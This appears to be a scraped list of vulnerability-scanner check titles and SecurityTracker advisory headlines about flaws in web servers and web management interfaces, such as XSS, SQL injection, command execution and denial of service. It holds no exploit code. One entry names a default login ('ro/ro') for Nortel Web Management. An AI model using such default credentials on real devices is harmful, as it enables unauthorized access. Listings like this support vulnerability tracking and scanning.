[80055] Easy File Sharing Web Server Information Disclosure
[80046] Webroot SpySweeper Enterprise Check
[80030] Packeteer PacketShaper Web Denial of Service
[80027] NetScaler web management XSS
[80025] NetScaler web management login
[80023] NetScaler web management cookie information
[80022] NetScaler web management cookie cipher weakness
[80021] WebCalendar User Account Enumeration Disclosure Issue
[80020] Symantec Web Security flaws
[80019] Symantec Web Security Detection
[72613] FreeBSD Ports: webmin
[71848] FreeBSD Ports: icedtea-web
[71385] FreeBSD Ports: WebCalendar-devel
[70727] FreeBSD Ports: WebCalendar
[69325] Debian Security Advisory DSA 2188-1 (webkit)
[69112] Debian Security Advisory DSA 2177-1 (pywebdav)
[68950] FreeBSD Ports: webkit-gtk2
[68823] FreeBSD Ports: webkit-gtk2
[68513] FreeBSD Ports: webkit-gtk2
[67992] FreeBSD Ports: webkit-gtk2
[67711] FreeBSD Ports: webkit-gtk2
[66148] Gentoo Security Advisory GLSA 200911-01 (horde horde-webmail horde-groupware)
[65836] SLES10: Security update for Websphere Community Edition
[65766] SLES10: Security update for Websphere Community Edition
[65685] SLES11: Security update for Websphere Community Edition
[65296] SLES9: Security update for webdav apache module
[64983] Ubuntu USN-836-1 (webkit)
[64396] Fedora Core 11 FEDORA-2009-6166 (webkitgtk)
[63700] FreeBSD Ports: pivot-weblog
[63683] Debian Security Advisory DSA 1752-1 (webcit)
[63571] Debian Security Advisory DSA 1725-1 (websvn)
[63551] Gentoo Security Advisory GLSA 200903-20 (websvn)
[63358] FreeBSD Ports: websvn
[63312] FreeBSD Ports: ganglia-monitor-core, ganglia-monitor-webfrontend
[60293] Debian Security Advisory DSA 1486-1 (gnatsweb)
[60055] FreeBSD Ports: ganglia-webfrontend
[58866] FreeBSD Ports: WebCalendar
[58845] FreeBSD Ports: webmin
[58458] Gentoo Security Advisory GLSA 200707-05 (webmin/usermin)
[58331] Debian Security Advisory DSA 1279-1 (webcalendar)
[58319] Debian Security Advisory DSA 1267-1 (webcalendar)
[57861] Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)
[57540] Debian Security Advisory DSA 1199-1 (webmin)
[57067] FreeBSD Ports: webmin
[56974] FreeBSD Ports: WebCalendar
[56955] Debian Security Advisory DSA 1096-1 (webcalendar)
[56745] Debian Security Advisory DSA 1056-1 (webcalendar)
[56689] Gentoo Security Advisory GLSA 200605-04 (phpwebsite)
[56643] FreeBSD Ports: phpwebftp
[56410] Debian Security Advisory DSA 1002-1 (webcalendar)
[56333] Gentoo Security Advisory GLSA 200602-14 (noweb)
[56316] FreeBSD Ports: WebCalendar
[56274] Debian Security Advisory DSA 968-1 (noweb)
[55975] Gentoo Security Advisory GLSA 200512-02 (webmin usermin)
[55637] FreeBSD Ports: webcalendar
[55435] Gentoo Security Advisory GLSA 200509-17 (Webmin Usermin)
[55209] Debian Security Advisory DSA 799-1 (webcalendar)
[55198] Gentoo Security Advisory GLSA 200508-21 (phpwebsite)
[54983] Gentoo Security Advisory GLSA 200507-07 (phpwebsite)
[54965] Gentoo Security Advisory GLSA 200506-13 (webapp-config)
[54869] Gentoo Security Advisory GLSA 200503-04 (phpwebsite)
[54844] Gentoo Security Advisory GLSA 200502-12 (Webmin)
[54756] Gentoo Security Advisory GLSA 200411-35 (phpwebsite)
[54597] Gentoo Security Advisory GLSA 200406-12 (webmin)
[54447] Debian Security Advisory DSA 766-1 (webcalendar)
[53676] Debian Security Advisory DSA 392-1 (webfs)
[53617] Debian Security Advisory DSA 328-1 (webfs)
[53612] Debian Security Advisory DSA 323-1 (noweb)
[53608] Debian Security Advisory DSA 319-1 (webmin)
[53538] Debian Security Advisory DSA 712-1 (geneweb)
[53303] Debian Security Advisory DSA 223-1 (geneweb)
[53234] Debian Security Advisory DSA 544-1 (webmin)
[53217] Debian Security Advisory DSA 526-1 (webmin)
[52436] FreeBSD Ports: openwebmail
[52391] FreeBSD Ports: webmin
[52127] FreeBSD Ports: kdewebdev
[20170] phpWebThings forum Parameter SQL Injection Vulnerabilities
[20108] Fingerprint web server with favicon.ico
[20014] WebGUI < 6.7.6 arbitrary command execution
[19946] WebWasher < 4.4.1 Build 1613 Multiple Vulnerabilities
[19689] Embedded Web Server Detection
[19305] Community Link Pro webeditor login.cgi remote command execution
[18586] webadmin.php detection
[18478] WebHints remote command execution flaw
[18424] MiniShare webserver buffer overflow
[18376] Athena Web Registration remote command execution flaw
[18366] Several GET locks web server
[18364] Sambar Server Administrative Interface multiple XSS
[18292] WebAPP Apage.CGI remote command execution flaw
[18213] RSA Security RSA Authentication Agent For Web XSS
[18212] 4D WebStar Tomcat Plugin Remote Buffer Overflow flaw
[18192] YusASP Web Asset Manager Vulnerability
[18177] Websense reporting console detection
[17636] Outlook Web Access URL Injection
[17343] phpWebLog Cross Site Scripting
[17304] Default web account on Zyxel
[16463] Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability
[16168] WebLibs File Disclosure
[15752] WebCalendar SQL Injection
[15716] Nortel Web Management Default Username and Password (ro/ro)
[15529] Open WebMail userstat.pl Arbitrary Command Execution
[14718] Cisco bug ID CSCdu35577 (Web Check)
[14379] Multiple Vulnerabilities in Merak Webmail / IceWarp Web Mail
[14254] Vulnerability in Exchange Server 5.5 Outlook Web Access XSS (842436)
[14249] Opera web browser news url denial of service vulnerability
[14248] Opera web browser large javaScript array handling vulnerability
[14247] Opera web browser file download extension spoofing
[14245] Opera web browser address bar spoofing weakness (2)
[14244] Opera web browser address bar spoofing weakness
[14241] 4D WebStar Symbolic Link Vulnerability
[14221] Open WebMail Detection
[14181] Mozilla/Firefox user interface spoofing
[12637] Open WebMail vacation.pl Arbitrary Command Execution
[12295] Dell OpenManage Web Server <= 3.7.1
[12262] Open WebMail Content-Type XSS
[12233] eMule Plus Web Server detection
[12074] Talentsoft Web+ reveals install path
[12049] Default Novonyx Web Server Files
[12048] Netware Web Server Sample Page Source Disclosure
[12043] BEA WebLogic Operator/Admin Password Disclosure Vulnerability
[11980] Compaq Web SSI DoS
[11939] foxweb CGI
[11927] TelCondex Simple Webserver Buffer Overflow
[11894] TinyWeb 1.9
[11879] Compaq Web-based Management Login
[11808] Microsoft RPC Interface Buffer Overrun (823980)
[11771] webadmin.dll detection
[11732] Webnews.exe vulnerability
[11724] WebLogic source code disclosure
[11722] cgiWebupdate.exe vulnerability
[11707] Bugbear.B web backdoor
[11556] CISCO Secure ACS Management Interface Login Overflow
[11546] Xeneo web server %A DoS
[11545] Xeneo Web Server 2.2.9.0 DoS
[11544] MonkeyWeb POST with too much data
[11518] Checkpoint Firewall open Web administration
[11486] WebLogic management servlet
[11182] DB4Web directory traversal
[11181] WebSphere Host header overflow
[11180] DB4Web TCP relay
[11167] Webserver4everyone too long URL
[11166] KF Web Server /%00 bug
[11162] WebSphere Edge caching proxy denial of service
[11151] Webserver 4D Cleartext Passwords
[11131] Sambar web server DOS
[11095] webcart.cgi
[11089] Webseal denial of service
[11085] Personal Web Sharing overflow
[11079] Snapstream PVS web directory traversal
[11072] Basilix Webmail Dummy Request Vulnerability
[11063] LabView web server DoS
[11047] Jigsaw webserver MS/DOS device DoS
[11037] WEB-INF folder accessible
[11015] Xerver web server DOS
[11005] LocalWeb2000 remote read
[10967] Shambala web server DoS
[10963] Compaq Web Based Management Agent Proxy Vulnerability
[10962] Cabletron Web View Administrative Access
[10849] Oracle 9iAS DAD Admin interface
[10816] Webalizer Cross Site Scripting Vulnerability
[10815] Web Server Cross Site Scripting
[10793] Cobalt Web Administration Server Detection
[10791] Ultraseek Web Server Detect
[10789] Novell Groupwise WebAcc Information Disclosure
[10781] Outlook Web anonymous access
[10775] E-Shopping Cart Arbitrary Command Execution (WebDiscount)
[10773] MacOS X Finder reveals contents of Apache Web files
[10756] MacOS X Finder reveals contents of Apache Web directories
[10748] Mediahouse Statistics Web Server Detect
[10744] VisualRoute Web Server Detection
[10743] Tripwire for Webpages Detection
[10741] SiteScope Web Administration Server Detection
[10740] SiteScope Web Management Server Detect
[10739] Novell Web Server NDS Tree Browsing
[10738] Oracle Web Administration Server Detection
[10732] IIS 5.0 WebDav Memory Leakage
[10715] BEA WebLogic Scripts Server scripts Source Disclosure
[10711] Sambar webserver pagecount hole
[10698] WebLogic Server /%00/ bug
[10697] WebLogic Server DoS
[10676] CheckPoint Firewall-1 Web Authentication Detection
[10662] Web mirroring
[10616] webspirs.cgi
[10573] IIS 5.0 Sample App reveals physical path of web root
[10533] Web Shopper remote file retrieval
[10532] eXtropia Web Store remote file retrieval
[10402] CVSWeb detection
[10385] ht://Dig's htsearch reveals web server path
[10373] TalentSoft Web+ version detection
[10355] vqServer web traversal vulnerability
[10302] robot(s).txt exists on the Web Server
SecurityTracker - https://www.securitytracker.com:
[1028856] Splunk Web Interface Permits Remote Clickjacking Attacks
[1028853] Cisco Wide Area Application Services Web Interface Bug Lets Remote Authenticated Users Execute Arbitrary Commands
[1028852] Cisco Application and Content Networking System Web Interface Bug Lets Remote Authenticated Users Execute Arbitrary Commands
[1027926] Polycom HDX Series Input Validation Flaw in Web Management Interface Permits Cross-Site Scripting Attacks
[1027785] Splunk Input Validation Flaws in Splunk Web Interface Permits Cross-Site Scripting Attacks
[1027285] SMC SMC8024L2 Switch Web Interface Discloses Configuration Data to Remote Users
[1025088] Cisco Security Agent Web Management Interface Bug Lets Remote Users Execute Arbitrary Code
[1024844] Citrix Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks
[1024122] CUPS Web Interface Permits Cross-Site Request Forgery Attacks
[1023370] IBM Rational ClearQuest Web Interface May Disclose Passwords in Certain Cases
[1023069] Websense Email Security Input Validation Flaws in Administrative Interface Permits Cross-Site Scripting Attacks
[1022605] Cisco Wireless LAN Controller SSH and Web Interface Bugs Let Remote Users Deny Service
[1022596] DD-WRT Web Interface Bug Lets Remote Users Execute Arbitrary Code
[1022403] NETGEAR DG632 Router Web Interface Can Be Crashed By Remote Users
[1022237] Nortel Contact Center Administration Lets Remote Users Bypass Authentication to Access the Web Interface
[1022145] Citrix Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks
[1021227] Safari WebKit Plug-in Interface Lets Remote Users Launch Local Applications
[1021110] Citrix Web Interface Session Disconnect Bug Lets Local Users Gain Elevated Privileges
[1020807] 3Com Wireless 8760 Access Point Web Interface Processing Bug Lets Remote Users Service
[1020784] DreamBox Web Interface Can Be Crashed By Remote Users Requesting a Long URL
[1020359] Novell GroupWise Input Validation Hole in the WebAccess Simple Interface Permits Cross-Site Scripting Attacks
[1020266] uTorrent Web User Interface Can Be Crashed By Remote Users
[1020265] BitTorrent Web User Interface Can Be Crashed By Remote Users
[1019132] Citrix Web Interface Input Validation Hole in Online Help Permits Cross-Site Scripting Attacks
[1018554] cgis.biz WebCart Input Validation Hole in Management Interface Permits Cross-Site Scripting Attacks
[1017113] Sun Java System/iPlanet Messaging Server Webmail Interface Lets Remote Users Execute Javascript on the Target User's System
[1016578] SpeedStream Web Administration Interface Lets Remote Users Deny Service
[1016462] Juniper DX Application Acceleration Platform Input Validation Hole in Web Interface Permits Cross-Site Scripting Attacks
[1016155] PunkBuster Buffer Overflow in WebTool Interface Lets Remote Users Deny Service
[1015787] BorderWare MXtreme Vulnerability in Web Administration Interface Has Unspecified Impact
[1015722] LISTSERV Web Archive Interface Unspecified Bugs Let Remote Users Execute Arbitrary Code
[1015688] Thomson Speed Touch 500 Series Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks
[1015250] PowerChute Network Shutdown Uses a Non-Secure Web Interface
[1014885] Sawmill Input Validation Error in Web Administration Interface Permits Cross-Site Scripting Attacks
[1014605] BusinessObjects Enterprise Unspecified Flaw in Web Interface Lets Remote Users Deny Service
[1014604] Crystal Reports Server Unspecified Flaw in Web Interface Lets Remote Users Deny Service
[1014474] Darwin Streaming Server Web Admin Interface Lets Remote Users Deny Service
[1013322] Mitel 3300 ICP PBX Web Interface Session Limits Let Remote Authenticated Users Deny Service
[1013321] Mitel 3300 ICP PBX Predictable Session IDs on the Web Interface Let Remote Users Hijack Sessions
[1011379] Pinnacle ShowCenter Web Interface Can Be Damaged By Remote Users
[1011157] WhatsUp Gold Web Interface May Let Remote Users Cause Denial of Service Conditions
[1010743] Lexmark Printer Web Interface Can Be Crashed By Remote Users Sending Long HOST Header Values
[1010068] SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access
[1009620] ImgSvr Web Interface Discloses Directory Listings and Files to Remote Users
[1008806] webcamXP Web Interface Input Validation Flaw Permits Cross-Site Scripting Attacks
[1007342] Cisco IOS Web Interface Buffer Overflow Lets Remote Users Send 2GB HTTP GET Requests to Execute Arbitrary Code
[1007293] HP Color LaserJet Web Interface Permits Remote Cross-Site Scripting Attacks
[1007196] ASUS ADSL Router Web Interface Discloses Passwords to Remote Users
[1007046] VisNetic MailServer Web Mail Interface Discloses PHP Source Code to Remote Users
[1006854] Axis Network Camera Web Interface Authentication Flaw Yields Root Access to Remote Users
[1006337] NETGEAR FVS318 VPN Firewall Can Be Crashed Via the Web Browser Interface
[1006091] Abyss Web Server Permits Brute Force Password Guessing on the Administrative Interface
[1006074] Ericsson ADSL Modem Web Management Interface Grants Access to Any Remote User
[1005369] Oracle 9i Application Server Web Cache Administration Interface Can Be Crashed By Remote Users
[1005367] ArGoSoft Mail Server Web Interface Input Filtering Bug Lets Remote Users Steal E-mail Passwords
[1004997] Citrix MetaFrame Running on Windows NT4 Terminal Server Can Be Crashed By a Remote User via the Java ICA Web Terminal Interface
[1004867] Lucent Access Point Routers Can Be Crashed By Remote Users Sending a Large HTTP GET Request to the Web Management Interface
[1004866] Brother NC-3100h Print Server Can Be Crashed By Remote Users Sending a Large Password to the Web Interface
[1004857] SEH IC-9 Pocket Print Server Can Be Crashed By Remote Users Sending a Large Password to the Web Interface
[1004328] ViewCVS Web-based CVS Interface Allows Cross-Site Scripting Attacks Against ViewCVS Users
[1004275] Critical Path inJoin Directory Server 'iCon' Web Administration Interface Discloses Files on the System to Authenticated Remote Users
[1002258] WinWrapper Professional Firewall Software Discloses Arbitrary Files to Remote Users via the Remote Web Management Interface
[1002131] HP JetDirect Print Servers Fail to Set an Administrator Password for the Telnet Interface When the Administrator Sets Passwords Via the Web Interface
[1001855] Gnatsweb GNU Bug Tracking System Lets Remote Users Retrieve Files from the Server and Execute Commands on the Server via the Web Interface
[1001065] Cisco's Aironet Wireless Bridge Allows Display and Modification Via Web Even When the Web Interface Is Disabled
[1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
[1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
[1028879] Cisco Unified Communications Manager Web Page Flaw Permits Cross-Site Request Forgery Attacks
[1028877] Cisco Unified Communications Manager User Web Dialer Flaw Permits Cross-Site Request Forgery Attacks
[1028876] Cisco WebEx Meeting Center Discloses Potentially Sensitive Information to Remote Users
[1028875] Cisco WebEx Meetings Server Status Verification Flaw Lets Remote Authenticated Users Access the System After Deactivation
[1028851] Cisco Wide Area Application Services Web Service Framework Bug Lets Remote Users Execute Arbitrary Code
[1028847] IBM WebSphere Commerce Web Services Flaw Lets Remote Users Hijack Sessions
[1028846] IBM WebSphere Commerce REST Services Session Management Flaw Lets Remote Users Hijack Sessions
[1028836] Symantec Web Gateway Bugs Permit Cross-Site Scripting, Cross-Site Request Forgery, Command Injection, and SQL Injection Attacks
[1028831] Cisco ASA Input Validation Flaw in WebVPN Portal Login Page Permits Cross-Site Scripting Attacks
[1028821] Samsung PS50C7700 TV Web Server Processing Flaw Lets Remote Users Deny Service
[1028726] IBM WebSphere MQ Buffer Overflow in MQ Control Commands Lets Local Users Gain Elevated Privileges
[1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
[1028708] Cisco IronPort AsyncOS Software for Cisco Web Security Appliance Bugs Let Remote Users Deny Service and Remote Authenticated Users Execute Arbitrary Commands
[1028695] Cisco WebEx Social Flaw Permits Cross-Site Request Forgery Attacks
[1028686] IBM WebSphere Commerce Oracle Padding Attack Against 'krypto' Parameter Lets Certain Remote Users Obtain Potentially Sensitive Information
[1028672] Siemens SIMATIC WinCC Web Navigator Bugs Let Remote Users Inject SQL Commands and Login to the System
[1028634] FileMaker Pro Input Validation Flaw in 'Instant Web Publish' Permits Cross-Site Scripting Attacks
[1028633] Cisco WebEx Meetings Server Discloses Event Passwords and Host Keys to Remote Users
[1028619] IBM WebSphere Portal Server Input Validation Flaw in Web Content Viewer Portlet Permits Cross-Site Scripting Attacks
[1028605] Splunk Web Input Validation Flaw Permits Cross-Site Scripting Attacks
[1028602] IBM WebSphere Portal Input Validation Flaw Permits HTTP Response Splitting Attacks
[1028595] IBM WebSphere DataPower SOA Appliance Input Validation Flaw Permits Cross-Site Scripting Attacks
[1028592] Cisco WebEx for iOS Certificate Validation Flaw Lets Remote Users Spoof the Server
[1028575] Apple iTunes WebKit Memory Corruption Flaws Let Remote Users Execute Arbitrary Code
[1028566] WebEx Social Input Validation Flaws Permit Remote Authenticated Script Injection and Data Modification Attacks
[1028539] RSA Authentication Agent for Web Input Validation Flaw Permits Cross-Site Scripting Attacks
[1028537] Cisco Unified Presence Web Framework Bug Lets Remote Users Deny Service
[1028513] Cisco Webex Meetings Server Bug Lets Remote Users View Files in the Cache Directory
[1028505] IBM Classic Sametime Meetings Server Input Validation Flaw in Web Application Permits Cross-Site Scripting Attacks
[1028454] Novell GroupWise WebAccess Input Validation Flaw in 'OnError' Attribute Permits Cross-Site Scripting Attacks
[1028411] Microsoft Office Web Apps Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks
[1028386] Sophos Web Protection Appliance Bugs Let Remote Users View Files and Conduct Cross-Site Scripting Attacks and Remote Authenticated Users Execute Arbitrary Commands
[1028375] IBM InfoSphere Replication Server Dashboard Web Server Discloses File and Directory Listings to Remote Authenticated Users
[1028371] Splunk Web Input Validation Flaw Permits Cross-Site Scripting Attacks
[1028334] IBM Tivoli Endpoint Manager Input Validation Hole in Web Reports Permits Cross-Site Scripting Attacks
[1028333] IBM Rational ClearQuest Input Validation Hole in Web Client Permits Cross-Site Scripting Attacks
[1028267] IBM WebSphere DataPower SOA Appliance TLS/DTLS CBC Mode Oracle Padding Lets Remote Users Recover Plaintext
[1028266] Google Chrome WebKit Type Confusion Error Lets Remote Users Execute Arbitrary Code
[1028245] IBM WebSphere Commerce Web Services Flaw Lets Remote Users Deny Service
[1028154] Cisco Secure Access Control System Command Line Interface Flaw Lets Local Users Gain Root Privileges
[1028153] Cisco Prime LAN Management Solution Command Line Interface Flaw Lets Local Users Gain Root Privileges
[1028152] Cisco Identity Services Engine Software Command Line Interface Flaw Lets Local Users Gain Root Privileges
[1028151] Cisco Application Networking Manager Command Line Interface Flaw Lets Local Users Gain Root Privileges
[1028095] Cisco NAC Appliance Input Validation Flaw in Web Authentication Function Permits Cross-Site Scripting Attacks
[1028038] Barracuda Web Filter SSH Backdoor Lets Remote Users Access the System
[1028037] Barracuda Web Application Firewall SSH Backdoor Lets Remote Users Access the System
[1028016] WebEx Training Center Input Validation Flaw Permits Cross-Site Request Forgery Attacks
[1028014] WebEx Training Center Lets Remote Authenticated Users Delete Reservations Without Proper Permissions
[1028013] WebEx Training Center Lets Remote Authenticated Users Enable/Disable Recordings Without Proper Permissions
[1027919] Novell iPrint Unspecified 'op-client-interface-version' Flaw Lets Remote Users Execute Arbitrary Code
[1027889] IBM Rational ClearQuest Input Validation Hole in Web Server Permits Cross-Site Scripting Attacks
[1027888] IBM Rational ClearQuest Input Validation Flaw in Web Client Lets Remote Users Inject SQL Commands
[1027868] Citrix XenApp XML Service Interface Bug Lets Remote Users Execute Arbitrary Code
[1027830] Google Chrome Heap Overflow in WebGL Lets Remote Users Execute Arbitrary Code
[1027798] IBM WebSphere DataPower XC10 Appliance Bugs Let Remote Authenticated Users Gain Elevated Privileges and Remote Users Deny Service
[1027783] Adobe InDesign Server SOAP Interface Lets Remote Users Execute Arbitrary Commands
[1027738] IcedTea-Web Heap Overflow in IcedTeaScriptableJavaObject Lets Remote Users Execute Arbitrary Code
[1027722] Webmin Input Validation Hole in Real Name Field Permits Cross-Site Scripting Attacks
[1027713] Cisco Unified MeetingPlace Web Conferencing Bugs Let Remote Users Inject SQL Commands and Deny Service
[1027690] IBM Tivoli Monitoring Web Server HTTP TRACE/TRACK Support Lets Remote Users Obtain Potentially Sensitive Information
[1027639] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code
[1027615] Novell GroupWise WebAccess Input Validation Flaw in 'merge' Parameter Permits Cross-Site Scripting Attacks
[1027614] Novell GroupWise WebAccess Input Validation Flaw in HTML Email Permits Cross-Site Scripting Attacks
[1027525] Apple iTunes WebKit Memory Corruption Errors Let Remote Users Execute Arbitrary Code
[1027523] IceWarp Web Mail Discloses phpinfo() Details to Remote Users
[1027507] Webmin Flaws Let Remote Authenticated Users Execute Arbitrary Code and View Arbitrary Files
[1027500] Barracuda Web Filter Input Validation Flaws Permit Cross-Site Scripting Attacks
[1027462] IBM WebSphere Application Server Lets Remote Authenticated Users Gain Elevated Privileges
[1027443] McAfee Email and Web Security Lets Remote Users Bypass Authentication and Conduct Cross-Site Scripting Attacks
[1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
[1027406] SAP NetWeaver SOAP Interface Lets Remote Users Execute Arbitrary Commands
[1027373] IBM WebSphere MQ File Transfer Edition Bug Permits Cross-Site Request Forgery Attacks
[1027372] IBM WebSphere MQ File Transfer Edition Bug Lets Remote Authenticated Users Access Other File Transfers
[1027358] Symantec Web Gateway Input Validation Flaw Lets Remote Users Inject SQL Commands
[1027355] Cisco ASA SIP and WebVPN Bugs Let Remote Users Deny Service
[1027349] Cisco Catalyst Switch Local Web Authentication Bug Lets Remote Authenticated Users Deny Service
[1027306] IBM WebSphere MQ Bug Lets Remote Users Access the Queue Manager
[1027289] Symantec Web Gateway Input Validation Flaws Let Remote Users Inject SQL Commands, Execute Arbitrary Commands, and Change User Passwords
[1027276] Sun ONE/iPlanet Web Server Bug Lets Remote Users Cause Partial Denial of Service Conditions
[1027258] Mozilla Seamonkey Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1027257] Mozilla Thunderbird Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1027256] Mozilla Firefox Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1027223] Microsoft IIS Web Server Discloses Potentially Sensitive Information to Remote Users
[1027217] Novell GroupWise WebAccess Directory Traversal Flaw Lets Remote Users View Files
[1027212] Cisco WebEx Player Buffer Overflows and Memory Corruption Errors Let Remote Users Execute Arbitrary Code
[1027186] Juniper Mobility System Software Input Validation Flaw in WebAAA Portal Permits Cross-Site Scripting Attacks
[1027138] HP Web Jetadmin Input Validation Hole Permits Cross-Site Scripting Attacks
[1027134] IBM WebSphere Sensor Events Input Validation Flaws Permit Cross-Site Scripting Attacks
[1027078] Symantec Web Gateway Bugs Let Remote Users View/Upload/Delete Files, Execute Arbitrary Commands, and Conduct Cross-Site Scripting Attacks
[1027053] Apple Safari WebKit Flaw Lets Remote Users Fill Out Form Inputs on a Target Web Page for a Target User
[1027025] Symantec Web Gateway Input Validation Hole in 'spywall/timer.php' Permits Cross-Site Scripting Attacks
[1026999] IBM WebSphere Application Server 'plugin-key.kdb' Password Expiration Date Lets Remote Users Conduct Spoofing Attacks
[1026973] Mozilla Thunderbird Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1026972] Mozilla Seamonkey Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1026971] Mozilla Firefox Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1026966] WebCalendar Access Control and File Inclusion Bugs Let Remote Users Potentially Execute Arbitrary Code
[1026961] Asterisk Manager Interface Lets Remote Authenticated Users Execute Shell Commands
[1026951] Oracle iPlanet Web Server Admin Console Flaw Lets Remote Users Partially Access and Modify Data and Partially Deny Service
[1026888] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code
[1026880] IBM Tivoli Directory Server Input Validation Flaw in Web Admin Tool Permits Cross-Site Scripting Attacks
[1026825] Webglimpse 'query' Parameter Validation Flaw Lets Remote Users Inject Operating System Commands
[1026806] McAfee Email and Web Security Appliance Lets Remote Users Conduct Cross-Site Scripting Attacks and Remote Authenticated Users Gain Elevated Privileges
[1026773] Barracuda Web Application Firewall Input Validation Hole in 'filter' Parameter Permits Cross-Site Scripting Attacks
[1026769] Blackberry PlayBook Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code
[1026768] Blackberry OS Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code
[1026767] Google Android Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code
[1026704] IBM WebSphere DataPower Lets Remote Users Decrypt SSL/TLS Traffic
[1026695] Citrix XenServer Multiple Flaws in Web Self Service Have Unspecified Impact
[1026693] Lenovo ThinkManagement Console SOAP Interface Lets Remote Users Upload and Delete Files and Execute Arbitrary Code
[1026525] EMC SourceOne Web Search Lets Local Users Obtain Passwords
[1026522] IBM WebSphere Application Server for z/OS Input Validation Flaw in Web Messaging Permits Cross-Site Scripting Attacks
[1026521] IBM WebSphere Application Server Unspecified Flaw Has Unspecified Impact
[1026486] @Mail WebMail Input Validation Flaws Permit Script Injection Attacks
[1026481] IBM Web Experience Factory Input Validation Flaw Permits Cross-Site Scripting Attacks
[1026457] Websense Products Have Multiple Flaws That Let Remote Users Execute Commands, Access the System, and Conduct Cross-Site Scripting Attacks
[1026438] WebSVN Input Validation Flaw in getLog() Permits Cross-Site Scripting Attacks
[1026329] IBM WebSphere MQ Lets Local Users Gain Elevated Privileges
[1026304] IcedTea-Web Lets Remote Users Bypass Cross-Origin Restrictions
[1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
[1026252] Trend Micro InterScan Web Security Lets Local Users Gain Elevated Privileges
[1026244] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code
[1026222] Sun GlassFish Enterprise Server Web Container Bug Lets Remote Users Deny Service
[1026199] phpMyAdmin Input Validation Flaw in Setup Interface Permits Cross-Site Scripting Attacks
[1026170] IBM WebSphere ILOG Rule Team Server Input Validation Flaw Permits Cross-Site Scripting Attacks
[1026099] IBM WebSphere Application Server Administrative Console Permits Cross-Site Request Forgery Attacks
[1026074] IBM WebSphere Commerce Edition Input Validation Holes Permit Cross-Site Scripting Attacks
[1026063] SAP NetWeaver 'com.sap.ipc.webapp.ipcpricing' Application May Disclose Potentially Sensitive Information
[1026058] JBoss Web Services Native DTD Recursive Processing Error Lets Remote Users Deny Service
[1026055] SAP Web Application Server Flaws Permit Denial of Service, Cross-Site Scripting, and Shortcut Creation Attacks
[1025998] IBM WebSphere Application Server Community Edition Tomcat Webdav Servlet Bug Has Unspecified Impact
[1025992] IBM WebSphere Application Server Discloses Restricted Files to Remote Users
[1025972] Cisco Unified Presence Open Query Interface Lets Remote Users Obtain Database Contents
[1025971] Cisco Unified Communications Manager Open Query Interface Lets Remote Users Obtain Database Contents
[1025917] HP webOS Calendar Application Lets Remote Users Execute Arbitrary HTML/JavaScript Code
[1025916] HP webOS Contacts Application Lets Remote Users Execute Arbitrary HTML/JavaScript Code
[1025897] Windows Remote Desktop Web Access Validation Flaw Permits Cross-Site Scripting Attacks
[1025854] IcedTea-Web Bugs Let Remote Users Determine the Home Directory Path and Manipulate the Security Warning Dialog
[1025852] Samba Web Administration Tool (SWAT) Input Validation Flaws Permit Cross-Site Request Forgery and Cross-Site Scripting Attacks
[1025846] CA ARCserve D2D RPC Interface Lets Remote Users Bypass Access Controls
[1025831] Apple Laptop Battery Interface Lets Local Users Deny Service
[1025804] Sun GlassFish Server Administrative Interface Flaws Let Remote Users Partially Access and Modify Data
[1025753] Symantec Web Gateway Input Validation Flaw in 'forget.php' Lets Remote Users Inject SQL Commands
[1025698] IBM Rational Team Concert Input Validation Flaw in User Interface Permits Cross-Site Scripting Attacks
[1025683] IBM Security Network IPS Web Application Firewall Can Be Bypassed By Remote Users
[1025678] Hitachi Web Server Unspecified Directory Indexing Flaw Lets Remote Users Deny Service
[1025676] Mozilla Firefox WebGL Implementation Flaw Lets Remote Users Obtain Graphics Memory Contents
[1025672] Sunway ForceControl Heap Overflow in WebServer Lets Remote Users Execute Arbitrary Code
[1025665] IBM WebSphere Application Server Permits Cross-Site Request Forgery Attacks
[1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks
[1025617] Subversion mod_dav_svn Baselined WebDAV Request Processing Lets Remote Users Deny Service
[1025607] WebSVN Input Validation Flaw in 'dl.php' Lets Remote Users Execute Arbitrary Code
[1025567] Cisco IOS XR SPA Interface Processor IPv4 Packet Processing Flaw Lets Remote Users Deny Service
[1025564] Cisco Content Delivery System Internet Streamer Web Server Can Be Crashed By Remote Users
[1025562] IBM WebSphere Input Validation Hole Permits Cross-Site Scripting Attacks
[1025559] Mitel Audio and Web Conferencing Input Validation Flaws Permit Cross-Site Scripting Attacks
[1025514] Palm webOS Flaws Let Remote Users Write to the File System or Execute Arbitrary Code
[1025447] Trustwave WebDefend Enterprise Default Credentials Let Remote Users Access the Device
